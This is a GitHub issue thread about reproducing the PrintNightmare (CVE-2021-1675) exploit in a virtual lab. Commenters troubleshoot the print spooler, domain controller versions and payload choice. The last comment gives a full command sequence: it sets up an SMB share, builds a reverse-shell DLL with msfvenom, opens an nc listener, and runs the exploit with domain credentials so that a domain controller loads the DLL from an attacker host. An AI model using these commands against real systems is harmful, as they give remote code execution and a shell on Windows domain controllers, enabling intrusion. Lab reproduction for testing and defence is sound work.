New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
How to Reproduce (Virtual Environment): #19
Comments
Shell i reboot all machine? |
sometimes the spools service get crashed make sure that the service is running you can use rpcdump to verify |
DC and Client all need to be make sure? |
interesting try to check manually on the DC, |
I use Server 2012 as DC,will it cause problems? |
basically no but if remember right I saw someone on Twitter claiming he had problems with that version |
OK,i will use your config.Thank you very mach, hope i can fix that before dinner.I have work for it 2days...(;´༎ຶД༎ຶ`) |
😄 it all good it took me 4 days until I was able to reproduce just try harder 😉 |
server 2012 r2 (dc) will failed with normal user |
I think this issue is because of the hard coded shebang (e.g. - Changing to |
Thank you, my using the payload windows/shell_reverse_tcp fails. Using the payload you suggest, windows/x64/shell_reverse_tcp is successful. |
This is how I was able to reproduce the exploit in a virtual environment:
The best practice is to create Python virtual Environment
python3 -m venv PrintNightmare
source PrintNightmare/bin/activate
git clone https://github.com/cube0x0/CVE-2021-1675.git
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
Spin up SMB share:
impacket-smbserver smb /tmp/
In case you have some problems with the SMB try to use build-in SMBD service
service smbd start
Create Reverse shell Payload as a DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll
nc -lnvp 9001
python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'
Machines:
The text was updated successfully, but these errors were encountered: